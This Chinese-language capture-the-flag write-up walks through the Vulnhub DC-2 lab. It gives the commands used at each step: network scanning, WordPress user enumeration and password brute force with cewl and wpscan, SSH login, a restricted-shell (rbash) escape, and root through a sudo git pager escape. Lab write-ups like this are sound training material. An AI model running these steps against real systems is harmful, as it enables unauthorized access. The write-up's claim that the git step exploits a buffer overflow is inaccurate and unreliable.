【Vulnhub靶场】DC-2

DC-2 靶场下载地址: https://download.vulnhub.com/dc/DC-2.zip

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

信息收集

常规我使用nmap三扫描,扫存活主机、扫端口、扫服务

第一步探测到存活主机IP为:192.168.118.139

javascript 复制代码
nmap -sP 192.168.118.0/24

nmap -p- 192.168.118.139

nmap -sV -A 192.168.118.139

发现开放了80端口和7744端口,但扫服务时并没有7744的端口信息,指定端口,再次扫描服务

发现7744端口是一个ssh服务

访问80端口的web页面,无法打开,返回前面查看信息,是要修改hosts

进入hosts,添加 192.168.118.139 dc-2

bash 复制代码
vim /etc/hosts

然后重新访问 http://dc-2/

在下方有一个Flag,点击进入,得到 flag1

falg1提示:我们应该使用 cewl 生成密码,爆破账号,登录多个账号之类的

此页面还看到其CMS为 WordPress

暴力破解

cewl 是一个生成密码字典的工具,接下来我们用cewl生成一个密码字典存放在桌面上

bash 复制代码
cewl http://dc-2/ -w /root/Desktop/pass.txt

使用 wpsan 爆破用户名

wpsan是一款专门用来扫描 WordPress网站漏洞的工具

bash 复制代码
wpscan --url dc-2 -e u

最后扫出来三个用户名,将这三个用户名整理在一起,下一步就是爆破账号密码了

使用刚生成的账号密码爆破,最后成功爆破出两个账号密码:

bash 复制代码
wpscan --url http://dc-2/ -U user.txt -P pass.txt

成功拿到 jerry 和 tom 的密码,下一步就是登录了

使用dirserach 遍历目录,找到登录界面

bash 复制代码
dirsearch -u http://dc-2/

访问http://dc-2/wp-admin/,进入登录页面

在tom里面没有发现有用的信息,在jerry里面成功找到了flag2

flag2提示:如果你不能利用WordPress并采取快捷方式,还有另一种方法,希望你能找到另一个切入点。这是让我们接着干啊

SSH远程登录

想到前面开放的7744端口,尝试使用ssh登录,因为端口被修改,需要指定7744端口

bash 复制代码
ssh [email protected] -p 7744		#登录jerry
ssh [email protected] -p 7744		#登录tom

尝试发现只有tom能够登录

在tom的目录下面找到了flag3,不能使用cat、find、vim等指令,发现好多的指令都无法使用,使用compgen -c 可查看当前可使用指令,最后尝试发现vi可以打开

flag3提示:老tom总是在追jerry,也许他应该为他所造成的所有压力负责

根据提示,应该是jerry的权限比tom的高,现在我们应该提权到jerry

rbash逃逸

查询资料发现rbash为受限制的 bash。其可以用作中转服务器,或者仅使用 ssh 来访问网页等等。它与一般shell的区别在于会限制一些行为,让一些命令无法执行

所以我们设置shell来绕过rbash(设置变量a为一个shell,执行a)

bash 复制代码
BASH_CMDS[a]=/bin/sh;a 

此处shell已经变为了a,但还是切换不到,这是因为我们还没添加环境变量

bash 复制代码
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

添加完环境变量,重新切换到jerry,成功

成功进入jerry,然后cd到jerry目录,ls查看,发现flag4

flag4提示我们到这一步只剩下最终的flag了, 这是个让我们拿root权限的意思,而且最后一句有提示git,那应该就是git提权

git提权

原理是git存在缓冲区溢出漏洞,在使用sudo git -p help时,不需要输入root密码即可以root权限执行这条命令。

使用sudo -l 查看root身份执行的命令,发现有git

直接输入命令

bash 复制代码
sudo git help config

然后输入

bash 复制代码
!/bin/bash

然后cd到root目录下,成功发现最终的flag

final-flag

相关推荐
mingzhi611 天前
绿盟二面面试题
android·web安全·渗透测试
RLG_星辰1 天前
prime-2 靶场笔记(vuInhub靶场)
linux·笔记·网络安全·渗透测试·权限维持·smb协议·lxd提权
H轨迹H9 天前
HTB-UnderPass
网络安全·渗透测试·hack the box·web漏洞·oscp
网络研究院9 天前
2025 年 4 月补丁星期二预测:微软将推出更多 AI 安全功能
人工智能·安全·microsoft·漏洞·威胁·补丁
炫彩@之星11 天前
内网渗透-MySQL提权
渗透测试·内网渗透·udf提权·mysql提权
vortex512 天前
Bash中因数值比较引发的提权漏洞:数组注入与任意命令执行
linux·开发语言·安全·网络安全·渗透测试·bash
炫彩@之星12 天前
mysql-getshell的几种方法
mysql·网络安全·渗透测试·getshell
炫彩@之星12 天前
mysql数据库中getshell的方式总结
mysql·网络安全·渗透测试·getshell
vortex513 天前
Windows 权限配置文件解析与安全分析(GPP,GPO,LSA)
windows·安全·渗透测试